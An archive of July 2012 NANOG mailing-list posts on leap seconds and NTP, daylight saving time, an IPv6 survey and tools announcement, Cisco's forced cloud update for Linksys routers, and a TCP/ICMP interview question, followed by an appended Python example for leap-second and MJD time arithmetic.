On 05/07/12 13:05, Nick Hilliard wrote:
> On 05/07/2012 11:34, Jared Mauch wrote:
>> Live further north and you will see the difference dst makes.
>
> This is true.
> Ireland, UK, NL, Denmark, northern Germany and northern
> Poland are at a similar latitude to Polar Bear Provincial Park by Hudson
> Bay. With DST, we get much more usable evenings March through October, and
> the sun rises at 05:00 instead of 04:00 in the morning, so early risers
> don't get woken up at 4 every day. During the winter, regular time means
> that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is
> serious win.
>
> Nick
>
>

Live further north and you will see the absurdity of dst. :)
I live in Norway. In summer the sun is up, in winter the sun is not up.
At this latitude, dst is..meh.

Henning

From jared at puck.nether.net Thu Jul 5 06:25:15 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Thu, 5 Jul 2012 07:25:15 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF5781C.9030808@sportradar.com>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com>
Message-ID: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net>

On Jul 5, 2012, at 7:18 AM, Henning Stener wrote:
> On 05/07/12 13:05, Nick Hilliard wrote:
>> On 05/07/2012 11:34, Jared Mauch wrote:
>>> Live further north and you will see the difference dst makes.
>>
>> This is true. Ireland, UK, NL, Denmark, northern Germany and northern
>> Poland are at a similar latitude to Polar Bear Provincial Park by Hudson
>> Bay. With DST, we get much more usable evenings March through October, and
>> the sun rises at 05:00 instead of 04:00 in the morning, so early risers
>> don't get woken up at 4 every day. During the winter, regular time means
>> that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is
>> serious win.
>>
>> Nick
>>
>>
>
> Live further north and you will see the absurdity of dst. :)
> I live in Norway. In summer the sun is up, in winter the sun is not up.
> At this latitude, dst is..meh.

I'm only at (approximately) 42.28755874876601 north.
Once you go near 60 north the value changes significantly.

There is a band of latitudes where it does make more sense.

From rirving at antient.org Thu Jul 5 06:30:34 2012
From: rirving at antient.org (Richard Irving)
Date: Thu, 05 Jul 2012 07:30:34 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net>
References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net>
Message-ID: <4FF57ADA.7010504@antient.org>

"I'm only at (approximately) 42.28755874876601 north. Once you go near 60 north the value changes significantly."

"There is a band of latitudes where it does make more sense."

It sure isn't Indiana.

http://thinkprogress.org/climate/2010/03/13/205642/daylight-saving-time-energy-dst/?mobile=nc

On 07/05/2012 07:25 AM, Jared Mauch wrote:
>
> On Jul 5, 2012, at 7:18 AM, Henning Stener wrote:
>
>> On 05/07/12 13:05, Nick Hilliard wrote:
>>> On 05/07/2012 11:34, Jared Mauch wrote:
>>>> Live further north and you will see the difference dst makes.
>>> This is true. Ireland, UK, NL, Denmark, northern Germany and northern
>>> Poland are at a similar latitude to Polar Bear Provincial Park by Hudson
>>> Bay. With DST, we get much more usable evenings March through October, and
>>> the sun rises at 05:00 instead of 04:00 in the morning, so early risers
>>> don't get woken up at 4 every day. During the winter, regular time means
>>> that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is
>>> serious win.
>>>
>>> Nick
>>>
>>>
>> Live further north and you will see the absurdity of dst. :)
>> I live in Norway. In summer the sun is up, in winter the sun is not up.
>> At this latitude, dst is..meh.
> I'm only at (approximately) 42.28755874876601 north. Once you go near 60 north the value changes significantly.
> > There is a band of latitudes where it does make more sense.

From jcurran at arin.net Thu Jul 5 07:00:25 2012 From: jcurran at arin.net (John Curran) Date: Thu, 5 Jul 2012 12:00:25 +0000 Subject: 2012 Global IPv6 Deployment Survey - Please take a moment to complete! Message-ID: <81AD1A9F-4C33-4D97-958F-D1623D0968CC@arin.net>

NANOG Folks - IPv6 - You may love it (or hate it) but either way it would be good to take just a few moments to complete the Global IPv6 Deployment Survey (see attached). The survey is being conducted in cooperation with the Regional Internet Registries in order to better understand IPv6 deployment trends. Global IPv6 Deployment Survey: Thanks! /John John Curran President and CEO ARIN

=== Global IPv6 Deployment Survey Extended to 13 July 2012

Our thanks to those who have completed the 2012 IPv6 Deployment Monitoring Survey. If you have not yet participated, there is still time! The survey has been extended to Friday, 13 July. If you haven't yet, we would appreciate if you could take a few minutes to complete the survey at: https://www.surveymonkey.com/s/GlobalIPv6survey2012 The purpose of the survey is to better understand what can be done to increase IPv6 adoption worldwide. The findings from the 2012 survey will be compared to previous years to give a perspective on progress in various regions and globally. For those interested, the results of last year's survey are available at: http://www.nro.net/wp-content/uploads/ipv6_deployment_survey.pdf. The results will be presented and discussed widely. Please provide your name and contact information on the survey form if you wish to receive the draft survey analysis when available. Please also indicate whether you are willing to share additional data with the TNO and GNKS Consult IPv6 Deployment Monitoring team. We appreciate your time and interest in completing this survey.
If you have any questions concerning the survey, please send an email to: info at gnksconsult.com Regards, Communications and Member Services American Registry for Internet Numbers (ARIN

From fernando at gont.com.ar Thu Jul 5 09:18:24 2012 From: fernando at gont.com.ar (Fernando Gont) Date: Thu, 05 Jul 2012 15:18:24 +0100 Subject: IPv6 security tools released Message-ID: <4FF5A230.4010908@gont.com.ar>

Folks, A bunch of IPv6 security tools I produced these last couple of years have been posted online at: . Not sure whether this was really intended, but since a number of folks have already noted (off-list) that this "release" has been announced on a number of pages and twitter accounts, I thought it would be better to let you guys know about it (i.e., "the cat is out of the bag, already"). The tools compile & run on Linux and *BSD, and I'm planning to port them to Mac OS too (if only I had such a box... sigh :-) ). Any feedback will be welcome. P.S.: The slideware at: might give you some hints regarding how to use some of the tools. Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fgont at si6networks.com PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

From roll at Stupi.SE Thu Jul 5 16:30:58 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:30:58 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4559615.12396.1341349689104.JavaMail.root@benjamin.baylink.com> Message-ID:

> If you want to run a Google-patched NTP server and talk to it, you're welcome > to. The rest of us would prefer to just get it right, so we don't have to > get lied to.

The timescale implementation in NTP is correct according to how UTC is defined. I suggest leaving it alone, chances of improving on this part over what Mills has done in half a lifetime are slim.
(For those who want to state more incorrect things on this matter, let me just point out that Dave Mills received the PTTI award 2006, so NTP's implementation of time has sufficient peer review of people who defined how UTC/TAI works.. ) The time format has a best_before date like Unix, so it will require outside information to tell what modulos of time we are in after it runs out of bits. At the IETF TICTOC BOF (a long time ago, and no_one paid attention, as we were being DOSed by the 1588 and mobile people) it was suggested to make a timescale representation that would be future proof and work on places where time has a different rate compared to earth at sea level. -Peter

From roll at Stupi.SE Thu Jul 5 16:49:48 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:49:48 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID:

> > On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no > > "-" > No, but they're allowed; see Figure 9 of RFC 5905:

Steve, I commented that it was stated that we were doing both positive and negative corrections. Only positive corrections have been made, and yes, negative are possible. I pointed out in a previous post that we can count 57, 58, 00 or 57, 58, 59, 00 or 57, 58, 59, 60, 00. And actually, this is the only thing operating-systems and applications need to be capable of handling to make it a non_issue.

> LI Leap Indicator (leap): 2-bit integer warning of an impending leap > second to be inserted or deleted in the last minute of the current > month with values defined in Figure 9.
>
> +-------+----------------------------------------+
> | Value | Meaning                                |
> +-------+----------------------------------------+
> | 0     | no warning                             |
> | 1     | last minute of the day has 61 seconds  |
> | 2     | last minute of the day has 59 seconds  |
> | 3     | unknown (clock unsynchronized)         |
> +-------+----------------------------------------+

That's NTP packet format, used to implement NTP's representation of UTC, but not the definition of UTC... (What do I do if I receive a packet with "3".) Or better, all the UTC(k) are free-running and the (old) recommendation was to try to keep them within 1us, is that unsynchronized -:) And ooops, I did not catch that before, should it not say "last minute of the month"? If I remember right the posix standard doesn't allow "60" in seconds... -Peter

From roll at Stupi.SE Thu Jul 5 16:55:50 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:55:50 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID:

> > Leap seconds are to align the artificial and very stable atomic timescale > > with the irregular and slowing rotation of the earth. > > You are assuming facts not in evidence. The rotation is merely irregular within the capabilities of our scheme of measurement, calculation, and observation. Once upon a time eclipses of the sun and moon were "random magic", before the mechanism was understood. So to the periodic cycles of the rotation of the earth about its axis, the planet about the sun, etc., are viewed as "magical". This is not due to magic, but rather limitations of understanding.

Earth is 10e-8 in frequency, a nanosecond a day is kind of 10e-14 on frequency. Tom has done the work to document it..
http://www.leapsecond.com/museum/earth/ --Peter

From marshall.eubanks at gmail.com Thu Jul 5 10:14:59 2012 From: marshall.eubanks at gmail.com (Marshall Eubanks) Date: Thu, 5 Jul 2012 11:14:59 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID:

On Thu, Jul 5, 2012 at 9:55 AM, Peter Lothberg wrote: >> > Leap seconds are to align the artificial and very stable atomic timescale >> > with the irregular and slowing rotation of the earth. >> >> You are assuming facts not in evidence. The rotation is merely irregular within the capabilities of our scheme of measurement, calculation, and observation. Once upon a time eclipses of the sun and moon were "random magic", before the mechanism was understood. So to the periodic cycles of the rotation of the earth about its axis, the planet about the sun, etc., are viewed as "magical". This is not due to magic, but rather limitations of understanding. > > Earth is 10e-8 in frequency, a nanosecond a day is kind of 10e-14 on > frequency. > > > Tom has done the work to document it.. > > http://www.leapsecond.com/museum/earth/ >

And, by the way, the deformations and exchanges of angular momentum that drive Earth rotation variations are probably the best understood global geophysical processes there are. Absolutely no magic is required. Regards Marshall

> --Peter >

From smb at cs.columbia.edu Thu Jul 5 10:29:11 2012 From: smb at cs.columbia.edu (Steven Bellovin) Date: Thu, 5 Jul 2012 11:29:11 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID:

On Jul 5, 2012, at 10:49 48AM, Peter Lothberg wrote: >>> On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no >>> "-" >> No, but they're allowed; see Figure 9 of RFC 5905: > > Steve, > > I commented that it was stated that we were doing both positive and > negative corrections.
Only positive corrections have been made, and > yes, negative are possible. > > I pointed out in a previous post that we can count 57, 58, 00 > or 57, 58, 59, 00 or 57, 58, 59, 60, 00. And actually, this is the > only thing operating-systems and applications need to be capable of > handling to make it a non_issue.

Fair enough.

> > >> LI Leap Indicator (leap): 2-bit integer warning of an impending leap >> second to be inserted or deleted in the last minute of the current >> month with values defined in Figure 9.
>>
>> +-------+----------------------------------------+
>> | Value | Meaning                                |
>> +-------+----------------------------------------+
>> | 0     | no warning                             |
>> | 1     | last minute of the day has 61 seconds  |
>> | 2     | last minute of the day has 59 seconds  |
>> | 3     | unknown (clock unsynchronized)         |
>> +-------+----------------------------------------+
> > That's NTP packet format, used to implement NTP's representation of > UTC, but not the definition of UTC... (What do I do if I receive a > packet with "3".) Or better, all the UTC(k) are free-running and the > (old) recommendation was to try to keep them within 1us, is that > unsynchronized -:) > > And ooops, I did not catch that before, should it not say "last minute > of the month"?

The text as I copied it is certainly not consistent...

> > If I remember right the posix standard doesn't allow "60" in seconds... > > -Peter >

--Steve Bellovin, https://www.cs.columbia.edu/~smb

From roll at Stupi.SE Thu Jul 5 17:34:18 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:34:18 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID:

Most systems that deal with time have a slightly different way of doing it than U*ix.. ref: CCIR 457-1 Like this: 56113.6294791667 56113.6301736111 56113 is MJD, modified julian date (http://tycho.usno.navy.mil/mjd.html) Want to know the time between two observations, just subtract and you get days and fraction of day.
(It's about 60 sec between the lines above..) --P Ps: Tops20/Twenex/Tenex keeps the kernel time this way, in 18+18 bits...

> On 7/3/12, Vadim Antonov wrote: > > There's always a possibility of using pseudo-TAI internally by > > reconstructing it from UTC. This is not the best solution (because it > > requires systems to have long-term memory of past leap seconds, or > How about, instead of requiring systems to "remember" past leap seconds; > > You represent every single timestamp instead of as > timestamp = <32-bit int, seconds since jan 1 1970 00:00:00> > > You represent all system timestamps as tuples: > timestamp = ( <32-bit int seconds since jan 1 1970 00:00:00>, > since jan 1 1970> ) > > No need to retain a history. Just retain the data in the same way > that Hours, Minutes, and Second are retained. > Comparison is simple. > > (Timestamp2 - Offset2) - (Timestamp1 - Offset1) > > > The downside is you can no longer set your system clock by hand, > because humans won't know the right number of "leap seconds" to > supply when setting the time from their wall clock. > > That's a problem necessitating you keep a history anyways. > For time to be universally coordinated, it has to be coordinated. > > One of the basic requirements for system time is that it interacts > with humans, and > humans have to be able to set their clock from conventional time > sources which are based on local time, without the machine having to > be constantly updated or reach out on a network and figure out how > that translates into a reasonable machine time. > > -- > -JH > >

From roll at Stupi.SE Thu Jul 5 17:41:31 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:41:31 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID:

> On Tue, Jul 3, 2012 at 11:59 PM, Majdi S. Abbas wrote: > > On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote: > >> 4 years. These things are supposed to be synced to a NTP source > >> anyway.
> >> > >> Easiest solution is just remove leap second functionality from > >> mainline code, and make it something you have to special-compile for. > > > > Please reconcile these two statements. > > > > Thanks, > > > > --msa > > Someone running an NTP Server connected to a cesium clock could run > the leap-second time code. Since its *their job* to have the correct > time, they can do all the fancy rarely used things that make parts of > the Internet die every couple of years.

A "cesium clock" doesn't know it should do leap seconds unless you tell it, and it only affects the display and the internal time of the clock.. -:) The S1 NTP server and its host OS has to be told to set the leap-second indicator by hand too.. But all the systems on the internet have to know what to do with this information. In the case of a host_os that does not know about leap-seconds, NTP will have the correct time and then try to steer the host as fast as it can to lose/gain a second.. -P

From meirea at charterschoolit.com Thu Jul 5 10:51:40 2012 From: meirea at charterschoolit.com (Mario Eirea) Date: Thu, 5 Jul 2012 15:51:40 +0000 Subject: Cisco Update Message-ID: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com>

Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for its consumer-level routers. http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service -Mario Eirea

From roll at Stupi.SE Thu Jul 5 17:54:05 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:54:05 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF51C67.2080709@gmail.com> Message-ID:

> Rather than discussing the pros and cons of UTC and leap seconds, just > create your own time system. > > You could call it OpenTime.
OpenTime will use NTP servers where the > Stratum 1 servers are synced to some time standard that doesn't care > about leap seconds. That way the consumer can choose to connect his > machines to UTC or OpenTime.

And what do you do if "OpenTime" and "UTC" differ so that it matters? Does the flight leave at 1200 UTC or 1200 OpenTime? Most countries have a law that says something like "measurement is to be traceable to a national standard" for legal and trade use. (weight, mass, volume, current, time ...). For those who don't know, none of the national labs that have local representation of UTC have the EXACT same time. So if there is a dispute you need to be able to show traceability to YOUR national lab. -P

From hank at efes.iucc.ac.il Thu Jul 5 11:08:11 2012 From: hank at efes.iucc.ac.il (Hank Nussbacher) Date: Thu, 05 Jul 2012 19:08:11 +0300 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il>

At 15:51 05/07/2012 +0000, Mario Eirea wrote: >Has anyone seen this yet? Looks like Cisco was forcing people to join its >Cloud service through an update for its consumer-level routers. > >http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > >-Mario Eirea

For those of us who have not kept up with every latest feature that Cisco rolls out across all its platforms, can someone explain this new service? Is it like Windows update, where Cisco will auto-update your router s/w and thereby brick it? If I don't register my router with Cisco, what do I lose? I can't update it manually?
-Hank

From jgreco at ns.sol.net Thu Jul 5 10:24:09 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Thu, 5 Jul 2012 10:24:09 -0500 (CDT) Subject: Cisco Update In-Reply-To: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> Message-ID: <201207051524.q65FO9n3079600@aurora.sol.net>

> At 15:51 05/07/2012 +0000, Mario Eirea wrote: > >Has anyone seen this yet? Looks like Cisco was forcing people to join its > >Cloud service through an update for its consumer-level routers. > > > >http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > > > >-Mario Eirea > > For those of us who have not kept up with every latest feature that Cisco > rolls out across all its platforms, can someone explain this new > service? Is it like Windows update, where Cisco will auto-update your > router s/w and thereby brick it? If I don't register my router with Cisco, > what do I lose? I can't update it manually?

And what happens when your *cough* "router" isn't actually on the Internet? How can it be managed and upgraded on a regular old network? ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples.

From sean at seanharlow.info Thu Jul 5 11:26:15 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:26:15 -0400 Subject: Cisco Update In-Reply-To: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> Message-ID: <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info>

On Jul 5, 2012, at 12:08, Hank Nussbacher wrote: > For those of us who have not kept up with every latest feature that Cisco rolls out across all its platforms, can someone explain this new service?
Is it like Windows update, where Cisco will auto-update your router s/w and thereby brick it? If I don't register my router with Cisco, what do I lose? I can't update it manually?

Long story short, the affected routers (newer "Cisco" [former Linksys] consumer products) received an automatic firmware update which basically disables the device's onboard web UI and forces you to use Cisco's "cloud" management system. The biggest issue with this is that apparently it has some function, possibly for web filtering, which sends network traffic information of some sort to Cisco's service. They also state that regardless of the auto-update setting a device may be updated anyways if Cisco says so. One article I found says it affects the E2700, E3500, and E4500 models.

From sean at seanharlow.info Thu Jul 5 11:35:23 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:35:23 -0400 Subject: Cisco Update In-Reply-To: <201207051524.q65FO9n3079600@aurora.sol.net> References: <201207051524.q65FO9n3079600@aurora.sol.net> Message-ID: <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info>

On Jul 5, 2012, at 11:24, Joe Greco wrote: > And what happens when your *cough* "router" isn't actually on the > Internet? How can it be managed and upgraded on a regular old network?

If there is no internet connection, you get a very limited page that's apparently only really good to get you back online.

From owen at delong.com Thu Jul 5 11:33:05 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 09:33:05 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> Message-ID:

>> > > I'm only at (approximately) 42.28755874876601 north. Once you go near 60 north the value changes significantly.
> > There is a band of latitudes where it does make more sense.

Why punish the rest of us to accommodate a few people who live between about 50° and 55° latitude? Owen

From jlewis at lewis.org Thu Jul 5 11:42:57 2012 From: jlewis at lewis.org (Jon Lewis) Date: Thu, 5 Jul 2012 12:42:57 -0400 (EDT) Subject: Cisco Update In-Reply-To: <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID:

On Thu, 5 Jul 2012, Sean Harlow wrote: > On Jul 5, 2012, at 11:24, Joe Greco wrote: > >> And what happens when your *cough* "router" isn't actually on the >> Internet? How can it be managed and upgraded on a regular old network? > > If there is no internet connection, you get a very limited page that's apparently only really good to get you back online.

Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco.

----------------------------------------------------------------------
Jon Lewis, MCP :)          |  I route
Senior Network Engineer    |  therefore you are
Atlantic Net               |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From sean at seanharlow.info Thu Jul 5 11:48:48 2012 From: sean at seanharlow.info (Sean Harlow) Date: Thu, 5 Jul 2012 12:48:48 -0400 Subject: Cisco Update In-Reply-To: References: <201207051524.q65FO9n3079600@aurora.sol.net> <9F05D45D-22A1-480E-9756-EB38134CE183@seanharlow.info> Message-ID: <2426C9B2-22F7-4B25-909D-51B98CD35F4B@seanharlow.info>

On Jul 5, 2012, at 12:42, Jon Lewis wrote: > Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco.
Not to defend Cisco's idiotic decision, but in this case the devices in question are extremely unlikely to be used in such a situation as they are consumer/SOHO products. The vast, overwhelming majority of these will be installed as the primary and/or only piece of network hardware other than the modem. I'd imagine that anyone who knows enough to care about a non-connected situation was never considering these devices in the first place. Frankly for the Joe Sixpack market I can't argue against the autoupdate idea itself, as outdated consumer routers probably account for a large percentage of the exploitable Linux systems out there, but the "cloud" tie in and privacy issues are clearly not well thought out.

From bicknell at ufp.org Thu Jul 5 11:49:03 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 09:49:03 -0700 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: <20120705164903.GA10480@ussenterprise.ufp.org>

In a message written on Thu, Jul 05, 2012 at 03:51:40PM +0000, Mario Eirea wrote: > Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for its consumer-level routers.

Perhaps going right to the source would be educational: http://home.cisco.com/en-us/cloud The short version appears to be Cisco wanted to move to a model where you could manage your home gateway remotely, and also store settings that may (in the future) be able to be reused if you replaced your device. All in all it sounds a lot to me like Meraki's solution (caveat, I've not used Meraki, just gotten the presentation). There's probably even a market for this sort of service.
Where they appear to have gone horribly wrong is that several models of Linksys routers with "auto-update" enabled downloaded this update and moved to this new management model with no user intervention, notice, or method of being downgraded. Thus folks who didn't want these features and may not have upgraded to them were caught by surprise, and have been effectively forced to take the new features due to a lack of downgrade path. Technology wise it's pretty non-interesting. Others have been doing similar things. From a customer relations point of view it's a total disaster, and one that should have been entirely predictable. I was never much of a fan of Linksys pre-Cisco, but post-Cisco it seems to be in a non-stop downhill slide... -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/

From ed at edgeoc.net Thu Jul 5 11:49:18 2012 From: ed at edgeoc.net (Edward Salonia) Date: Thu, 5 Jul 2012 16:49:18 +0000 Subject: Cisco Update Message-ID: <359105651-1341506959-cardhu_decombobulator_blackberry.rim.net-744118490-@b2.c2.bise6.blackberry>

Let's remember, this is regarding Cisco's consumer grade routers (formerly linksys) which are primarily intended for connecting small networks (homes, offices) to the internet over some type of broadband connection. Can they be used on a network with no internet connectivity? Sure. But this, as I'm sure many will agree, is not the environment in which they were intended to be deployed. Nor do I believe are they marketed as such.
- Ed

------Original Message------ From: Jon Lewis To: Sean Harlow Cc: nanog at nanog.org Subject: Re: Cisco Update Sent: Jul 5, 2012 12:42 PM

On Thu, 5 Jul 2012, Sean Harlow wrote: > On Jul 5, 2012, at 11:24, Joe Greco wrote: > >> And what happens when your *cough* "router" isn't actually on the >> Internet? How can it be managed and upgraded on a regular old network? > > If there is no internet connection, you get a very limited page that's apparently only really good to get you back online.

Routers are sometimes used on networks that don't have internet connectivity [by design]. This seems amazingly short-sighted for a company that's been around selling routing gear as long as cisco.

----------------------------------------------------------------------
Jon Lewis, MCP :)          |  I route
Senior Network Engineer    |  therefore you are
Atlantic Net               |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From dhubbard at dino.hostasaurus.com Thu Jul 5 11:55:54 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Thu, 5 Jul 2012 12:55:54 -0400 Subject: Cisco Update References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> Message-ID:

Technical users could always just flash DD-WRT onto the device and replace the Linksys/Cisco firmware; then you have a much more robust system without any big brother stuff.

From bill at herrin.us Thu Jul 5 12:02:08 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:02:08 -0400 Subject: job screening question Message-ID:

Hi folks, I gave my HR folks a screening question to ask candidates for an IP expert position. I've gotten some "unexpected" answers, so I want to do a sanity check and make sure I'm not asking something unreasonable. And by "unexpected" I don't mean naively incorrect answers, I mean oh-my-God-how-did-you-get-that-cisco-certification answers. The question was: You implement a firewall on which you block all ICMP packets.
What part of the TCP protocol (not IP in general, TCP specifically) malfunctions as a result?

My questions for you are: 1. As an expert who follows NANOG, do you know the answer? Or is this question too hard? 2. Is the question too vague? Is there a clearer way to word it? 3. Is there a better screening question I could pass to HR to ask and check the candidate's response against the supplied answer? Thanks, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004

From jared at puck.nether.net Thu Jul 5 12:07:04 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 13:07:04 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> Message-ID: <20120705170704.GA19613@puck.nether.net>

On Thu, Jul 05, 2012 at 09:33:05AM -0700, Owen DeLong wrote: > >> > > > > I'm only at (approximately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. > > > > There is a band of latitudes where it does make more sense. > > Why punish the rest of us to accommodate a few people who live between about 50° and 55° latitude?

(easier typing with a real keyboard)... This is a local/states rights issue imho :) AZ ignores DST and as a result I never know what time it is there ;) This is a local state-by-state and county-by-county issue as evidenced by the behavior of counties in Indiana that are close to or within the Chicago MSA. This is more a social issue than anything else. Many people prefer some daylight when they are not working. - Jared -- Jared Mauch | pgp key available via finger from jared at puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine.
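An added example, not code from any poster in this thread, for two points made earlier in it: Peter Lothberg's remark that counting 57, 58, 59, 60, 00 is the one thing an OS or application has to handle, and the (timestamp, leap-second offset) tuple proposal quoted in his reply, together with his MJD subtraction. Everything here is assumed rather than taken from the thread: the leap table lists only the 2009 and 2012 insertions, and the convention that a continuous second count equals POSIX seconds plus the offset is mine.

```python
"""Leap seconds as a (posix_seconds, leap_offset) tuple, plus MJD arithmetic.

Added example, not from the thread. Convention assumed here: a "continuous"
count ct advances once per real second, including inserted leap seconds;
POSIX time (which reuses a value at a positive leap second) is ct minus the
number of leap seconds inserted so far. That is the tuple form proposed in
the thread: timestamp = (posix_seconds, leap_seconds_since_1970).
"""
from datetime import datetime, timedelta, timezone

_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# Assumed (partial) leap-second table: POSIX time of the 00:00:00 UTC that
# follows each inserted 23:59:60. Only the 2009-01-01 and 2012-07-01
# insertions are listed, which is enough for the June 2012 event the
# thread is about. A real system would load the full table.
LEAP_INSERTIONS = [
    1230768000,  # 2009-01-01T00:00:00Z
    1341100800,  # 2012-07-01T00:00:00Z (the leap second of 2012-06-30)
]


def to_tuple(ct):
    """Map a continuous count to (posix_seconds, leap_offset, is_leap_second).

    The i-th inserted leap second (0-based) occupies ct == P_i + i, because
    i earlier leap seconds have already pushed ct ahead of POSIX time.
    """
    offset = 0
    is_leap = False
    for i, p in enumerate(LEAP_INSERTIONS):
        if ct < p + i:
            break
        offset += 1
        if ct == p + i:
            is_leap = True
    return ct - offset, offset, is_leap


def from_tuple(posix_seconds, leap_offset):
    """Inverse of to_tuple: the continuous count for a (posix, offset) pair."""
    return posix_seconds + leap_offset


def utc_label(ct):
    """Render a continuous count as UTC, allowing :60 in a leap minute."""
    posix_seconds, _, is_leap = to_tuple(ct)
    dt = _EPOCH + timedelta(seconds=posix_seconds)
    # During the inserted second POSIX time still reads 23:59:59; the
    # human-readable form is 23:59:60, which POSIX itself cannot express.
    return dt.strftime("%Y-%m-%dT%H:%M:") + ("60" if is_leap else dt.strftime("%S"))


def elapsed_seconds(t1, t2):
    """Real seconds between two (posix, offset) tuples, correct across a leap."""
    return from_tuple(*t2) - from_tuple(*t1)


def posix_to_mjd(posix_seconds):
    """Modified Julian Date: days since 1858-11-17, with fractional day."""
    return posix_seconds / 86400 + 40587  # 40587 = MJD of 1970-01-01


def mjd_delta_seconds(mjd_a, mjd_b):
    """Peter's observation: an MJD difference times 86400 is the interval in seconds."""
    return round((mjd_b - mjd_a) * 86400, 3)


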